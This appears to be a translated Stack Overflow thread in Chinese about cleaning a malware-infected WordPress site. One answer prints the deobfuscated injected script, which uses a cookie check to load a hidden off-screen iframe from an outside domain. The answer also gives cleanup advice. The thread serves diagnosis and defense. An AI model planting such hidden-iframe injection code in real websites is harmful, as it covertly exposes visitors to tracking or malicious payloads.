您的位置: 首页  >  技术问答  >  如何在网站上发现恶意代码/恶意软件

如何在网站上发现恶意代码/恶意软件

分类: 技术问答 2022-07-19 20:49:42
问题描述:

我的WordPress的网站最近感染了恶意软件,并被列入黑名单。我以为我通过更新网站和插件并删除任何我不认识的代码来修复它。如何在网站上发现恶意代码/恶意软件

然后,我使用Sucuri Site Checker,它看起来没问题,所以我向Google提交了一个审阅请求。但是,Google已经表示,它仍然以恶意代码的形式存在恶意软件(他们称之为代码注入)。

我有点失落了,该怎么做。有没有办法找到Google找到的代码位?该域名是sudorf.co.uk,但它有恶意软件,所以我不会建议去那里 - 不知道恶意软件会做什么。

任何帮助将不胜感激。

编辑:我发现代码几天前,删除它,然后我更新所有版本等,但显然它又回来了。有没有人有一个想法如何可能达到那里。我的想法是无论是从插件 - 这就是为什么我要删除所有这些。另一种是联系表格 - 但我不认为这会让他们编辑header.php。

+4

紧接着'

'后面有'
+0

关闭所有插件并恢复为标准主题,然后让Google重新测试。逐个添加它们直到发现问题。 Google是否不提供更多详细信息(如URL)? – halfer

+0

不,可悲的是,他们提供的唯一细节是与代码注入相关的。 –

这是纯粹的信息。你的恶意软件看起来是这样的,当它去迷惑:

function k09() { 
    var static = 'ajax'; 
    var controller = 'index.php'; 
    var k = document.createElement('iframe'); 

    k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php'; 
    k.style.position = 'absolute'; 
    k.style.color = '512'; 
    k.style.height = '512px'; 
    k.style.width = '512px'; 
    k.style.left = '1000512'; 
    k.style.top = '1000512'; 

    if (!document.getElementById('k')) { 
     document.write('<p id=\'k\' class=\'k09\' ></p>'); 
     document.getElementById('k').appendChild(k); 
    } 
} 

function SetCookie(cookieName, cookieValue, nDays, path) { 
    var today = new Date(); 
    var expire = new Date(); 
    if (nDays == null || nDays == 0) nDays = 1; 
    expire.setTime(today.getTime() + 3600000 * 24 * nDays); 
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); 
} 

function GetCookie(name) { 
    var start = document.cookie.indexOf(name + "="); 
    var len = start + name.length + 1; 
    if ((!start) && 
     (name != document.cookie.substring(0, name.length))) { 
     return null; 
    } 
    if (start == -1) return null; 
    var end = document.cookie.indexOf(";", len); 
    if (end == -1) end = document.cookie.length; 
    return unescape(document.cookie.substring(len, end)); 
} 
if (navigator.cookieEnabled) { 
    if (GetCookie('visited_uq') == 55) {} else { 
     SetCookie('visited_uq', '55', '1', '/'); 

     k09(); 
    } 
}

http://dostojewskij-gesellschaft.de/VD49Jdzr.php简单地输出“OK”。

为什么?

我的猜测是这是一个IP /流量记录器。也许黑客可以检查哪些博客是最活跃的,然后再回来并破解该特定网站(无需在每月有2位访问者的网站上浪费时间)。这是好的和坏的。

好部分是,它看来,他们没有使用任何用户数据库或其他任何

不好的部分是,他们很可能已经下载了整个数据库,因为他们显然已经在服务器上执行了权限,并且可能已经将PHP文件放到了服务器上。你最好的选择是从一个新的WP开始,一个接一个地复制插件/主题,同时手动检查它们。

更改全部密码。即使你的数据库登录。考虑一切妥协。

+0

我会做只是。感谢你的帮助 –

相关推荐